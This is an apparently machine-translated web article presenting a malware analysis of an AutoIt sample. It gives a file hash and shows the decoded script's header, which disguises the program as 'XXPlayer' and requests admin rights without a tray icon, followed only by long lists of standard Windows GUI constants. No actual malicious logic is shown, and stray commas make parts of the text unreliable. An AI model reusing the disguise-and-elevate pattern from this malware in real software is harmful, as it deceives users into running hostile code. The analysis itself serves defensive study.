A sample of Autoit malicious resource consumption 01/27 Update SLTechnology News&Howtos

A sample of Autoit malicious resource consumption

2025-01-27 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

File md5:b1c05acd8cbbf1bd9a2448da0c10c411

Signs of poisoning

Basic information acquisition

Basic PE information

The decoded script is:

/ / 2017-12-1 22:43

# NoTrayIcon

# RequireAdmin

# Region

# AutoIt3Wrapper_icon=C:\ Windows\ system32\ SHELL32.dll |-138

# AutoIt3Wrapper_UseUpx=n

# AutoIt3Wrapper_Res_Comment=XXPlayer

# AutoIt3Wrapper_Res_Description=XXPlayer

# AutoIt3Wrapper_Res_Fileversion=2.2.3.3

# AutoIt3Wrapper_Res_LegalCopyright=XXPlayer

# EndRegion

GLOBAL CONST $GUI_EVENT_CLOSE =-3

GLOBAL CONST $GUI_EVENT_MINIMIZE =-4

GLOBAL CONST $GUI_EVENT_RESTORE =-5

GLOBAL CONST $GUI_EVENT_MAXIMIZE =-6

GLOBAL CONST $GUI_EVENT_PRIMARYDOWN =-7

GLOBAL CONST $GUI_EVENT_PRIMARYUP =-8

GLOBAL CONST $GUI_EVENT_SECONDARYDOWN =-9

GLOBAL CONST $GUI_EVENT_SECONDARYUP =-10

GLOBAL CONST $GUI_EVENT_MOUSEMOVE =-11

GLOBAL CONST $GUI_EVENT_RESIZED =-12

GLOBAL CONST $GUI_EVENT_DROPPED =-13

GLOBAL CONST $GUI_RUNDEFMSG = "GUI_RUNDEFMSG"

GLOBAL CONST $GUI_AVISTOP = 0

GLOBAL CONST $GUI_AVISTART = 1

GLOBAL CONST $GUI_AVICLOSE = 2

GLOBAL CONST $GUI_CHECKED = 1

GLOBAL CONST $GUI_INDETERMINATE = 2

GLOBAL CONST $GUI_UNCHECKED = 4

GLOBAL CONST $GUI_DROPACCEPTED = 8

GLOBAL CONST $GUI_NODROPACCEPTED = 4096

GLOBAL CONST $GUI_ACCEPTFILES = $GUI_DROPACCEPTED

GLOBAL CONST $GUI_SHOW = 16

GLOBAL CONST $GUI_HIDE = 32

GLOBAL CONST $GUI_ENABLE = 64

GLOBAL CONST $GUI_DISABLE = 128

GLOBAL CONST $GUI_FOCUS = 256

GLOBAL CONST $GUI_NOFOCUS = 8192

GLOBAL CONST $GUI_DEFBUTTON = 512

GLOBAL CONST $GUI_EXPAND = 1024

GLOBAL CONST $GUI_ONTOP = 2048

GLOBAL CONST $GUI_FONTITALIC = 2

GLOBAL CONST $GUI_FONTUNDER = 4

GLOBAL CONST $GUI_FONTSTRIKE = 8

GLOBAL CONST $GUI_DOCKAUTO = 1

GLOBAL CONST $GUI_DOCKLEFT = 2

GLOBAL CONST $GUI_DOCKRIGHT = 4

GLOBAL CONST $GUI_DOCKHCENTER = 8

GLOBAL CONST $GUI_DOCKTOP = 32

GLOBAL CONST $GUI_DOCKBOTTOM = 64

GLOBAL CONST $GUI_DOCKVCENTER = 128

GLOBAL CONST $GUI_DOCKWIDTH = 256

GLOBAL CONST $GUI_DOCKHEIGHT = 512

GLOBAL CONST $GUI_DOCKSIZE = 768

GLOBAL CONST $GUI_DOCKMENUBAR = 544

GLOBAL CONST $GUI_DOCKSTATEBAR = 576

GLOBAL CONST $GUI_DOCKALL = 802

GLOBAL CONST $GUI_DOCKBORDERS = 102

GLOBAL CONST $GUI_GR_CLOSE = 1

GLOBAL CONST $GUI_GR_LINE = 2

GLOBAL CONST $GUI_GR_BEZIER = 4

GLOBAL CONST $GUI_GR_MOVE = 6

GLOBAL CONST $GUI_GR_COLOR = 8

GLOBAL CONST $GUI_GR_RECT = 10

GLOBAL CONST $GUI_GR_ELLIPSE = 12

GLOBAL CONST $GUI_GR_PIE = 14

GLOBAL CONST $GUI_GR_DOT = 16

GLOBAL CONST $GUI_GR_PIXEL = 18

GLOBAL CONST $GUI_GR_HINT = 20

GLOBAL CONST $GUI_GR_REFRESH = 22

GLOBAL CONST $GUI_GR_PENSIZE = 24

GLOBAL CONST $GUI_GR_NOBKCOLOR =-2

GLOBAL CONST $GUI_BKCOLOR_DEFAULT =-1

GLOBAL CONST $GUI_BKCOLOR_TRANSPARENT =-2

GLOBAL CONST $GUI_BKCOLOR_LV_ALTERNATE =-33554432

GLOBAL CONST $GUI_WS_EX_PARENTDRAG = 1048576

GLOBAL CONST $WS_TILED = 0

GLOBAL CONST $WS_OVERLAPPED = 0

GLOBAL CONST $WS_MAXIMIZEBOX = 65536

GLOBAL CONST $WS_MINIMIZEBOX = 131072

GLOBAL CONST $WS_TABSTOP = 65536

GLOBAL CONST $WS_GROUP = 131072

GLOBAL CONST $WS_SIZEBOX = 262144

GLOBAL CONST $WS_THICKFRAME = 262144

GLOBAL CONST $WS_SYSMENU = 524288

GLOBAL CONST $WS_HSCROLL = 1048576

GLOBAL CONST $WS_VSCROLL = 2097152

GLOBAL CONST $WS_DLGFRAME = 4194304

GLOBAL CONST $WS_BORDER = 8388608

GLOBAL CONST $WS_CAPTION = 12582912

GLOBAL CONST $WS_OVERLAPPEDWINDOW = 13565952

GLOBAL CONST $WS_TILEDWINDOW = 13565952

GLOBAL CONST $WS_MAXIMIZE = 16777216

GLOBAL CONST $WS_CLIPCHILDREN = 33554432

GLOBAL CONST $WS_CLIPSIBLINGS = 67108864

GLOBAL CONST $WS_DISABLED = 134217728

GLOBAL CONST $WS_VISIBLE = 268435456

GLOBAL CONST $WS_MINIMIZE = 536870912

GLOBAL CONST $WS_CHILD = 1073741824

GLOBAL CONST $WS_POPUP =-2147483648

GLOBAL CONST $WS_POPUPWINDOW =-2138570752

GLOBAL CONST $DS_MODALFRAME = 128

GLOBAL CONST $DS_SETFOREGROUND = 512

GLOBAL CONST $DS_CONTEXTHELP = 8192

GLOBAL CONST $WS_EX_ACCEPTFILES = 16

GLOBAL CONST $WS_EX_MDICHILD = 64

GLOBAL CONST $WS_EX_APPWINDOW = 262144

GLOBAL CONST $WS_EX_COMPOSITED = 33554432

GLOBAL CONST $WS_EX_CLIENTEDGE = 512

GLOBAL CONST $WS_EX_CONTEXTHELP = 1024

GLOBAL CONST $WS_EX_DLGMODALFRAME = 1

GLOBAL CONST $WS_EX_LEFTSCROLLBAR = 16384

GLOBAL CONST $WS_EX_OVERLAPPEDWINDOW = 768

GLOBAL CONST $WS_EX_RIGHT = 4096

GLOBAL CONST $WS_EX_STATICEDGE = 131072

GLOBAL CONST $WS_EX_TOOLWINDOW = 128

GLOBAL CONST $WS_EX_TOPMOST = 8

GLOBAL CONST $WS_EX_TRANSPARENT = 32

GLOBAL CONST $WS_EX_WINDOWEDGE = 256

GLOBAL CONST $WS_EX_LAYERED = 524288

GLOBAL CONST $WS_EX_CONTROLPARENT = 65536

GLOBAL CONST $WS_EX_LAYOUTRTL = 4194304

GLOBAL CONST $WS_EX_RTLREADING = 8192

GLOBAL CONST $WM_GETTEXTLENGTH = 14

GLOBAL CONST $WM_GETTEXT = 13

GLOBAL CONST $WM_SIZE = 5

GLOBAL CONST $WM_SIZING = 532

GLOBAL CONST $WM_USER = 1024

GLOBAL CONST $WM_CREATE = 1

GLOBAL CONST $WM_DESTROY = 2

GLOBAL CONST $WM_MOVE = 3

GLOBAL CONST $WM_ACTIVATE = 6

GLOBAL CONST $WM_SETFOCUS = 7

GLOBAL CONST $WM_KILLFOCUS = 8

GLOBAL CONST $WM_ENABLE = 10

GLOBAL CONST $WM_SETREDRAW = 11

GLOBAL CONST $WM_SETTEXT = 12

GLOBAL CONST $WM_PAINT = 15

GLOBAL CONST $WM_CLOSE = 16

GLOBAL CONST $WM_QUIT = 18

GLOBAL CONST $WM_ERASEBKGND = 20

GLOBAL CONST $WM_SYSCOLORCHANGE = 21

GLOBAL CONST $WM_SHOWWINDOW = 24

GLOBAL CONST $WM_WININICHANGE = 26

GLOBAL CONST $WM_DEVMODECHANGE = 27

GLOBAL CONST $WM_ACTIVATEAPP = 28

GLOBAL CONST $WM_FONTCHANGE = 29

GLOBAL CONST $WM_TIMECHANGE = 30

GLOBAL CONST $WM_CANCELMODE = 31

GLOBAL CONST $WM_SETCURSOR = 32

GLOBAL CONST $WM_MOUSEACTIVATE = 33

GLOBAL CONST $WM_CHILDACTIVATE = 34

GLOBAL CONST $WM_QUEUESYNC = 35

GLOBAL CONST $WM_GETMINMAXINFO = 36

GLOBAL CONST $WM_PAINTICON = 38

GLOBAL CONST $WM_ICONERASEBKGND = 39

GLOBAL CONST $WM_NEXTDLGCTL = 40

GLOBAL CONST $WM_SPOOLERSTATUS = 42

GLOBAL CONST $WM_DRAWITEM = 43

GLOBAL CONST $WM_MEASUREITEM = 44

GLOBAL CONST $WM_DELETEITEM = 45

GLOBAL CONST $WM_VKEYTOITEM = 46

GLOBAL CONST $WM_CHARTOITEM = 47

GLOBAL CONST $WM_SETFONT = 48

GLOBAL CONST $WM_GETFONT = 49

GLOBAL CONST $WM_SETHOTKEY = 50

GLOBAL CONST $WM_GETHOTKEY = 51

GLOBAL CONST $WM_QUERYDRAGICON = 55

GLOBAL CONST $WM_COMPAREITEM = 57

GLOBAL CONST $WM_GETOBJECT = 61

GLOBAL CONST $WM_COMPACTING = 65

GLOBAL CONST $WM_COMMNOTIFY = 68

GLOBAL CONST $WM_WINDOWPOSCHANGING = 70

GLOBAL CONST $WM_WINDOWPOSCHANGED = 71

GLOBAL CONST $WM_POWER = 72

GLOBAL CONST $WM_NOTIFY = 78

GLOBAL CONST $WM_COPYDATA = 74

GLOBAL CONST $WM_CANCELJOURNAL = 75

GLOBAL CONST $WM_INPUTLANGCHANGEREQUEST = 80

GLOBAL CONST $WM_INPUTLANGCHANGE = 81

GLOBAL CONST $WM_TCARD = 82

GLOBAL CONST $WM_HELP = 83

GLOBAL CONST $WM_USERCHANGED = 84

GLOBAL CONST $WM_NOTIFYFORMAT = 85

GLOBAL CONST $WM_CUT = 768

GLOBAL CONST $WM_COPY = 769

GLOBAL CONST $WM_PASTE = 770

GLOBAL CONST $WM_CLEAR = 771

GLOBAL CONST $WM_UNDO = 772

GLOBAL CONST $WM_CONTEXTMENU = 123

GLOBAL CONST $WM_STYLECHANGING = 124

GLOBAL CONST $WM_STYLECHANGED = 125

GLOBAL CONST $WM_DISPLAYCHANGE = 126

GLOBAL CONST $WM_GETICON = 127,

GLOBAL CONST $WM_SETICON = 128

GLOBAL CONST $WM_NCCREATE = 129

GLOBAL CONST $WM_NCDESTROY = 130

GLOBAL CONST $WM_NCCALCSIZE = 131,

GLOBAL CONST $WM_NCHITTEST = 132

GLOBAL CONST $WM_NCPAINT = 133

GLOBAL CONST $WM_NCACTIVATE = 134

GLOBAL CONST $WM_GETDLGCODE = 135

GLOBAL CONST $WM_SYNCPAINT = 136

GLOBAL CONST $WM_NCMOUSEMOVE = 160,

GLOBAL CONST $WM_NCLBUTTONDOWN = 161,

GLOBAL CONST $WM_NCLBUTTONUP = 162,

GLOBAL CONST $WM_NCLBUTTONDBLCLK = 163,

GLOBAL CONST $WM_NCRBUTTONDOWN = 164,

GLOBAL CONST $WM_NCRBUTTONUP = 165,

GLOBAL CONST $WM_NCRBUTTONDBLCLK = 166

GLOBAL CONST $WM_NCMBUTTONDOWN = 167,

GLOBAL CONST $WM_NCMBUTTONUP = 168

GLOBAL CONST $WM_NCMBUTTONDBLCLK = 169

GLOBAL CONST $WM_KEYDOWN = 256

GLOBAL CONST $WM_KEYUP = 257

GLOBAL CONST $WM_CHAR = 258

GLOBAL CONST $WM_DEADCHAR = 259

GLOBAL CONST $WM_SYSKEYDOWN = 260

GLOBAL CONST $WM_SYSKEYUP = 261

GLOBAL CONST $WM_SYSCHAR = 262,

GLOBAL CONST $WM_SYSDEADCHAR = 263

GLOBAL CONST $WM_INITDIALOG = 272

GLOBAL CONST $WM_COMMAND = 273

GLOBAL CONST $WM_SYSCOMMAND = 274

GLOBAL CONST $WM_TIMER = 275

GLOBAL CONST $WM_HSCROLL = 276

GLOBAL CONST $WM_VSCROLL = 277

GLOBAL CONST $WM_INITMENU = 278

GLOBAL CONST $WM_INITMENUPOPUP = 279

GLOBAL CONST $WM_MENUSELECT = 287

GLOBAL CONST $WM_MENUCHAR = 288

GLOBAL CONST $WM_ENTERIDLE = 289

GLOBAL CONST $WM_MENURBUTTONUP = 290

GLOBAL CONST $WM_MENUDRAG = 291

GLOBAL CONST $WM_MENUGETOBJECT = 292

GLOBAL CONST $WM_UNINITMENUPOPUP = 293

GLOBAL CONST $WM_MENUCOMMAND = 294

GLOBAL CONST $WM_CHANGEUISTATE = 295

GLOBAL CONST $WM_UPDATEUISTATE = 296

GLOBAL CONST $WM_QUERYUISTATE = 297

GLOBAL CONST $WM_CTLCOLORMSGBOX = 306

GLOBAL CONST $WM_CTLCOLOREDIT = 307

GLOBAL CONST $WM_CTLCOLORLISTBOX = 308

GLOBAL CONST $WM_CTLCOLORBTN = 309

GLOBAL CONST $WM_CTLCOLORDLG = 310

GLOBAL CONST $WM_CTLCOLORSCROLLBAR = 311

GLOBAL CONST $WM_CTLCOLORSTATIC = 312

GLOBAL CONST $WM_CTLCOLOR = 25

GLOBAL CONST $MN_GETHMENU = 481,

GLOBAL CONST $NM_FIRST = 0

GLOBAL CONST $NM_OUTOFMEMORY = $NM_FIRST-1

GLOBAL CONST $NM_CLICK = $NM_FIRST-2

GLOBAL CONST $NM_DBLCLK = $NM_FIRST-3

GLOBAL CONST $NM_RETURN = $NM_FIRST-4

GLOBAL CONST $NM_RCLICK = $NM_FIRST-5

GLOBAL CONST $NM_RDBLCLK = $NM_FIRST-6

GLOBAL CONST $NM_SETFOCUS = $NM_FIRST-7

GLOBAL CONST $NM_KILLFOCUS = $NM_FIRST-8

GLOBAL CONST $NM_CUSTOMDRAW = $NM_FIRST-12

GLOBAL CONST $NM_HOVER = $NM_FIRST-13

GLOBAL CONST $NM_NCHITTEST = $NM_FIRST-14

GLOBAL CONST $NM_KEYDOWN = $NM_FIRST-15

GLOBAL CONST $NM_RELEASEDCAPTURE = $NM_FIRST-16

GLOBAL CONST $NM_SETCURSOR = $NM_FIRST-17

GLOBAL CONST $NM_CHAR = $NM_FIRST-18

GLOBAL CONST $NM_TOOLTIPSCREATED = $NM_FIRST-19

GLOBAL CONST $NM_LDOWN = $NM_FIRST-20

GLOBAL CONST $NM_RDOWN = $NM_FIRST-21

GLOBAL CONST $NM_THEMECHANGED = $NM_FIRST-22

GLOBAL CONST $WM_MOUSEMOVE = 512

GLOBAL CONST $WM_LBUTTONDOWN = 513

GLOBAL CONST $WM_LBUTTONUP = 514

GLOBAL CONST $WM_LBUTTONDBLCLK = 515

GLOBAL CONST $WM_RBUTTONDOWN = 516

GLOBAL CONST $WM_RBUTTONUP = 517

GLOBAL CONST $WM_RBUTTONDBLCK = 518

GLOBAL CONST $WM_MBUTTONDOWN = 519

GLOBAL CONST $WM_MBUTTONUP = 520

GLOBAL CONST $WM_MBUTTONDBLCK = 521

GLOBAL CONST $WM_MOUSEWHEEL = 522

GLOBAL CONST $WM_XBUTTONDOWN = 523

GLOBAL CONST $WM_XBUTTONUP = 524

GLOBAL CONST $WM_XBUTTONDBLCLK = 525

GLOBAL CONST $WM_MOUSEHWHEEL = 526

GLOBAL CONST $PS_SOLID = 0

GLOBAL CONST $PS_DASH = 1

GLOBAL CONST $PS_DOT = 2

GLOBAL CONST $PS_DASHDOT = 3

GLOBAL CONST $PS_DASHDOTDOT = 4

GLOBAL CONST $PS_NULL = 5

GLOBAL CONST $PS_INSIDEFRAME = 6

GLOBAL CONST $LWA_ALPHA = 2

GLOBAL CONST $LWA_COLORKEY = 1

GLOBAL CONST $RGN_AND = 1

GLOBAL CONST $RGN_OR = 2

GLOBAL CONST $RGN_XOR = 3

GLOBAL CONST $RGN_DIFF = 4

GLOBAL CONST $RGN_COPY = 5

GLOBAL CONST $ERRORREGION = 0

GLOBAL CONST $NULLREGION = 1

GLOBAL CONST $SIMPLEREGION = 2

GLOBAL CONST $COMPLEXREGION = 3

GLOBAL CONST $TRANSPARENT = 1

GLOBAL CONST $OPAQUE = 2

GLOBAL CONST $CCM_FIRST = 8192

GLOBAL CONST $CCM_GETUNICODEFORMAT = ($CCM_FIRST + 6)

GLOBAL CONST $CCM_SETUNICODEFORMAT = ($CCM_FIRST + 5)

GLOBAL CONST $CCM_SETBKCOLOR = $CCM_FIRST + 1

GLOBAL CONST $CCM_SETCOLORSCHEME = $CCM_FIRST + 2

GLOBAL CONST $CCM_GETCOLORSCHEME = $CCM_FIRST + 3

GLOBAL CONST $CCM_GETDROPTARGET = $CCM_FIRST + 4

GLOBAL CONST $CCM_SETWINDOWTHEME = $CCM_FIRST + 11

GLOBAL CONST $GA_PARENT = 1

GLOBAL CONST $GA_ROOT = 2

GLOBAL CONST $GA_ROOTOWNER = 3

GLOBAL CONST $SM_CXSCREEN = 0

GLOBAL CONST $SM_CYSCREEN = 1

GLOBAL CONST $SM_CXVSCROLL = 2

GLOBAL CONST $SM_CYHSCROLL = 3

GLOBAL CONST $SM_CYCAPTION = 4

GLOBAL CONST $SM_CXBORDER = 5

GLOBAL CONST $SM_CYBORDER = 6

GLOBAL CONST $SM_CXDLGFRAME = 7

GLOBAL CONST $SM_CYDLGFRAME = 8

GLOBAL CONST $SM_CYVTHUMB = 9

GLOBAL CONST $SM_CXHTHUMB = 10

GLOBAL CONST $SM_CXICON = 11

GLOBAL CONST $SM_CYICON = 12

GLOBAL CONST $SM_CXCURSOR = 13

GLOBAL CONST $SM_CYCURSOR = 14

GLOBAL CONST $SM_CYMENU = 15

GLOBAL CONST $SM_CXFULLSCREEN = 16

GLOBAL CONST $SM_CYFULLSCREEN = 17

GLOBAL CONST $SM_CYKANJIWINDOW = 18

GLOBAL CONST $SM_MOUSEPRESENT = 19

GLOBAL CONST $SM_CYVSCROLL = 20

GLOBAL CONST $SM_CXHSCROLL = 21

GLOBAL CONST $SM_DEBUG = 22

GLOBAL CONST $SM_SWAPBUTTON = 23

GLOBAL CONST $SM_RESERVED1 = 24

GLOBAL CONST $SM_RESERVED2 = 25

GLOBAL CONST $SM_RESERVED3 = 26

GLOBAL CONST $SM_RESERVED4 = 27

GLOBAL CONST $SM_CXMIN = 28

GLOBAL CONST $SM_CYMIN = 29

GLOBAL CONST $SM_CXSIZE = 30

GLOBAL CONST $SM_CYSIZE = 31

GLOBAL CONST $SM_CXFRAME = 32

GLOBAL CONST $SM_CYFRAME = 33

GLOBAL CONST $SM_CXMINTRACK = 34

GLOBAL CONST $SM_CYMINTRACK = 35

GLOBAL CONST $SM_CXDOUBLECLK = 36

GLOBAL CONST $SM_CYDOUBLECLK = 37

GLOBAL CONST $SM_CXICONSPACING = 38

GLOBAL CONST $SM_CYICONSPACING = 39

GLOBAL CONST $SM_MENUDROPALIGNMENT = 40

GLOBAL CONST $SM_PENWINDOWS = 41

GLOBAL CONST $SM_DBCSENABLED = 42

GLOBAL CONST $SM_CMOUSEBUTTONS = 43

GLOBAL CONST $SM_SECURE = 44

GLOBAL CONST $SM_CXEDGE = 45

GLOBAL CONST $SM_CYEDGE = 46

GLOBAL CONST $SM_CXMINSPACING = 47

GLOBAL CONST $SM_CYMINSPACING = 48

GLOBAL CONST $SM_CXSMICON = 49

GLOBAL CONST $SM_CYSMICON = 50

GLOBAL CONST $SM_CYSMCAPTION = 51

GLOBAL CONST $SM_CXSMSIZE = 52

GLOBAL CONST $SM_CYSMSIZE = 53

GLOBAL CONST $SM_CXMENUSIZE = 54

GLOBAL CONST $SM_CYMENUSIZE = 55

GLOBAL CONST $SM_ARRANGE = 56

GLOBAL CONST $SM_CXMINIMIZED = 57

GLOBAL CONST $SM_CYMINIMIZED = 58

GLOBAL CONST $SM_CXMAXTRACK = 59

GLOBAL CONST $SM_CYMAXTRACK = 60

GLOBAL CONST $SM_CXMAXIMIZED = 61

GLOBAL CONST $SM_CYMAXIMIZED = 62

GLOBAL CONST $SM_NETWORK = 63

GLOBAL CONST $SM_CLEANBOOT = 67

GLOBAL CONST $SM_CXDRAG = 68

GLOBAL CONST $SM_CYDRAG = 69

GLOBAL CONST $SM_SHOWSOUNDS = 70

GLOBAL CONST $SM_CXMENUCHECK = 71

GLOBAL CONST $SM_CYMENUCHECK = 72

GLOBAL CONST $SM_SLOWMACHINE = 73

GLOBAL CONST $SM_MIDEASTENABLED = 74

GLOBAL CONST $SM_MOUSEWHEELPRESENT = 75

GLOBAL CONST $SM_XVIRTUALSCREEN = 76

GLOBAL CONST $SM_YVIRTUALSCREEN = 77

GLOBAL CONST $SM_CXVIRTUALSCREEN = 78

GLOBAL CONST $SM_CYVIRTUALSCREEN = 79

GLOBAL CONST $SM_CMONITORS = 80

GLOBAL CONST $SM_SAMEDISPLAYFORMAT = 81

GLOBAL CONST $SM_IMMENABLED = 82

GLOBAL CONST $SM_CXFOCUSBORDER = 83

GLOBAL CONST $SM_CYFOCUSBORDER = 84

GLOBAL CONST $SM_TABLETPC = 86

GLOBAL CONST $SM_MEDIACENTER = 87

GLOBAL CONST $SM_STARTER = 88

GLOBAL CONST $SM_SERVERR2 = 89

GLOBAL CONST $SM_CMETRICS = 90

GLOBAL CONST $SM_REMOTESESSION = 4096

GLOBAL CONST $SM_SHUTTINGDOWN = 8192

GLOBAL CONST $SM_REMOTECONTROL = 8193

GLOBAL CONST $SM_CARETBLINKINGENABLED = 8194

GLOBAL CONST $BLACKNESS = 66

GLOBAL CONST $CAPTUREBLT = 1073741824

GLOBAL CONST $DSTINVERT = 5570569

GLOBAL CONST $MERGECOPY = 12583114

GLOBAL CONST $MERGEPAINT = 12255782

GLOBAL CONST $NOMIRRORBITMAP =-2147483648

GLOBAL CONST $NOTSRCCOPY = 3342344

GLOBAL CONST $NOTSRCERASE = 1114278

GLOBAL CONST $PATCOPY = 15728673

GLOBAL CONST $PATINVERT = 5898313

GLOBAL CONST $PATPAINT = 16452105

GLOBAL CONST $SRCAND = 8913094

GLOBAL CONST $SRCCOPY = 13369376

GLOBAL CONST $SRCERASE = 4457256

GLOBAL CONST $SRCINVERT = 6684742

GLOBAL CONST $SRCPAINT = 15597702

GLOBAL CONST $WHITENESS = 16711778

GLOBAL CONST $DT_BOTTOM = 8

GLOBAL CONST $DT_CALCRECT = 1024

GLOBAL CONST $DT_CENTER = 1

GLOBAL CONST $DT_EDITCONTROL = 8192

GLOBAL CONST $DT_END_ELLIPSIS = 32768

GLOBAL CONST $DT_EXPANDTABS = 64

GLOBAL CONST $DT_EXTERNALLEADING = 512

GLOBAL CONST $DT_HIDEPREFIX = 1048576

GLOBAL CONST $DT_INTERNAL = 4096

GLOBAL CONST $DT_LEFT = 0

GLOBAL CONST $DT_MODIFYSTRING = 65536

GLOBAL CONST $DT_NOCLIP = 256

GLOBAL CONST $DT_NOFULLWIDTHCHARBREAK = 524288

GLOBAL CONST $DT_NOPREFIX = 2048

GLOBAL CONST $DT_PATH_ELLIPSIS = 16384

GLOBAL CONST $DT_PREFIXONLY = 2097152

GLOBAL CONST $DT_RIGHT = 2

GLOBAL CONST $DT_RTLREADING = 131072

GLOBAL CONST $DT_SINGLELINE = 32

GLOBAL CONST $DT_TABSTOP = 128

GLOBAL CONST $DT_TOP = 0

GLOBAL CONST $DT_VCENTER = 4

GLOBAL CONST $DT_WORDBREAK = 16

GLOBAL CONST $DT_WORD_ELLIPSIS = 262144

GLOBAL CONST $RDW_ERASE = 4

GLOBAL CONST $RDW_FRAME = 1024

GLOBAL CONST $RDW_INTERNALPAINT = 2

GLOBAL CONST $RDW_INVALIDATE = 1

GLOBAL CONST $RDW_NOERASE = 32

GLOBAL CONST $RDW_NOFRAME = 2048

GLOBAL CONST $RDW_NOINTERNALPAINT = 16

GLOBAL CONST $RDW_VALIDATE = 8

GLOBAL CONST $RDW_ERASENOW = 512

GLOBAL CONST $RDW_UPDATENOW = 256

GLOBAL CONST $RDW_ALLCHILDREN = 128

GLOBAL CONST $RDW_NOCHILDREN = 64

GLOBAL CONST $WM_RENDERFORMAT = 773

GLOBAL CONST $WM_RENDERALLFORMATS = 774

GLOBAL CONST $WM_DESTROYCLIPBOARD = 775

GLOBAL CONST $WM_DRAWCLIPBOARD = 776

GLOBAL CONST $WM_PAINTCLIPBOARD = 777

GLOBAL CONST $WM_VSCROLLCLIPBOARD = 778

GLOBAL CONST $WM_SIZECLIPBOARD = 779

GLOBAL CONST $WM_ASKCBFORMATNAME = 780

GLOBAL CONST $WM_CHANGECBCHAIN = 781

GLOBAL CONST $WM_HSCROLLCLIPBOARD = 782

GLOBAL CONST $HTERROR =-2

GLOBAL CONST $HTTRANSPARENT =-1

GLOBAL CONST $HTNOWHERE = 0

GLOBAL CONST $HTCLIENT = 1

GLOBAL CONST $HTCAPTION = 2

GLOBAL CONST $HTSYSMENU = 3

GLOBAL CONST $HTGROWBOX = 4

GLOBAL CONST $HTSIZE = $HTGROWBOX

GLOBAL CONST $HTMENU = 5

GLOBAL CONST $HTHSCROLL = 6

GLOBAL CONST $HTVSCROLL = 7

GLOBAL CONST $HTMINBUTTON = 8

GLOBAL CONST $HTMAXBUTTON = 9

GLOBAL CONST $HTLEFT = 10

GLOBAL CONST $HTRIGHT = 11

GLOBAL CONST $HTTOP = 12

GLOBAL CONST $HTTOPLEFT = 13

GLOBAL CONST $HTTOPRIGHT = 14

GLOBAL CONST $HTBOTTOM = 15

GLOBAL CONST $HTBOTTOMLEFT = 16

GLOBAL CONST $HTBOTTOMRIGHT = 17

GLOBAL CONST $HTBORDER = 18

GLOBAL CONST $HTREDUCE = $HTMINBUTTON

GLOBAL CONST $HTZOOM = $HTMAXBUTTON

GLOBAL CONST $HTSIZEFIRST = $HTLEFT

GLOBAL CONST $HTSIZELAST = $HTBOTTOMRIGHT

GLOBAL CONST $HTOBJECT = 19

GLOBAL CONST $HTCLOSE = 20

GLOBAL CONST $HTHELP = 21

GLOBAL CONST $COLOR_SCROLLBAR = 0

GLOBAL CONST $COLOR_BACKGROUND = 1

GLOBAL CONST $COLOR_ACTIVECAPTION = 2

GLOBAL CONST $COLOR_INACTIVECAPTION = 3

GLOBAL CONST $COLOR_MENU = 4

GLOBAL CONST $COLOR_WINDOW = 5

GLOBAL CONST $COLOR_WINDOWFRAME = 6

GLOBAL CONST $COLOR_MENUTEXT = 7

GLOBAL CONST $COLOR_WINDOWTEXT = 8

GLOBAL CONST $COLOR_CAPTIONTEXT = 9

GLOBAL CONST $COLOR_ACTIVEBORDER = 10

GLOBAL CONST $COLOR_INACTIVEBORDER = 11

GLOBAL CONST $COLOR_APPWORKSPACE = 12

GLOBAL CONST $COLOR_HIGHLIGHT = 13

GLOBAL CONST $COLOR_HIGHLIGHTTEXT = 14

GLOBAL CONST $COLOR_BTNFACE = 15

GLOBAL CONST $COLOR_BTNSHADOW = 16

GLOBAL CONST $COLOR_GRAYTEXT = 17

GLOBAL CONST $COLOR_BTNTEXT = 18

GLOBAL CONST $COLOR_INACTIVECAPTIONTEXT = 19

GLOBAL CONST $COLOR_BTNHIGHLIGHT = 20

GLOBAL CONST $COLOR_3DDKSHADOW = 21

GLOBAL CONST $COLOR_3DLIGHT = 22

GLOBAL CONST $COLOR_INFOTEXT = 23

GLOBAL CONST $COLOR_INFOBK = 24

GLOBAL CONST $COLOR_HOTLIGHT = 26

GLOBAL CONST $COLOR_GRADIENTACTIVECAPTION = 27

GLOBAL CONST $COLOR_GRADIENTINACTIVECAPTION = 28

GLOBAL CONST $COLOR_MENUHILIGHT = 29

GLOBAL CONST $COLOR_MENUBAR = 30

GLOBAL CONST $COLOR_DESKTOP = 1

GLOBAL CONST $COLOR_3DFACE = 15

GLOBAL CONST $COLOR_3DSHADOW = 16

GLOBAL CONST $COLOR_3DHIGHLIGHT = 20

GLOBAL CONST $COLOR_3DHILIGHT = 20

GLOBAL CONST $COLOR_BTNHILIGHT = 20

GLOBAL CONST $HINST_COMMCTRL =-1

GLOBAL CONST $IDB_STD_SMALL_COLOR = 0

GLOBAL CONST $IDB_STD_LARGE_COLOR = 1

GLOBAL CONST $IDB_VIEW_SMALL_COLOR = 4

GLOBAL CONST $IDB_VIEW_LARGE_COLOR = 5

GLOBAL CONST $IDB_HIST_SMALL_COLOR = 8

GLOBAL CONST $IDB_HIST_LARGE_COLOR = 9

GLOBAL CONST $STARTF_FORCEOFFFEEDBACK = 128

GLOBAL CONST $STARTF_FORCEONFEEDBACK = 64

GLOBAL CONST $STARTF_RUNFULLSCREEN = 32

GLOBAL CONST $STARTF_USECOUNTCHARS = 8

GLOBAL CONST $STARTF_USEFILLATTRIBUTE = 16

GLOBAL CONST $STARTF_USEHOTKEY = 512

GLOBAL CONST $STARTF_USEPOSITION = 4

GLOBAL CONST $STARTF_USESHOWWINDOW = 1

GLOBAL CONST $STARTF_USESIZE = 2

GLOBAL CONST $STARTF_USESTDHANDLES = 256

GLOBAL CONST $CDDS_PREPAINT = 1

GLOBAL CONST $CDDS_POSTPAINT = 2

GLOBAL CONST $CDDS_PREERASE = 3

GLOBAL CONST $CDDS_POSTERASE = 4

GLOBAL CONST $CDDS_ITEM = 65536

GLOBAL CONST $CDDS_ITEMPREPAINT = 65537

GLOBAL CONST $CDDS_ITEMPOSTPAINT = 65538

GLOBAL CONST $CDDS_ITEMPREERASE = 65539

GLOBAL CONST $CDDS_ITEMPOSTERASE = 65540

GLOBAL CONST $CDDS_SUBITEM = 131072

GLOBAL CONST $CDIS_SELECTED = 1

GLOBAL CONST $CDIS_GRAYED = 2

GLOBAL CONST $CDIS_DISABLED = 4

GLOBAL CONST $CDIS_CHECKED = 8

GLOBAL CONST $CDIS_FOCUS = 16

GLOBAL CONST $CDIS_DEFAULT = 32

GLOBAL CONST $CDIS_HOT = 64

GLOBAL CONST $CDIS_MARKED = 128

GLOBAL CONST $CDIS_INDETERMINATE = 256

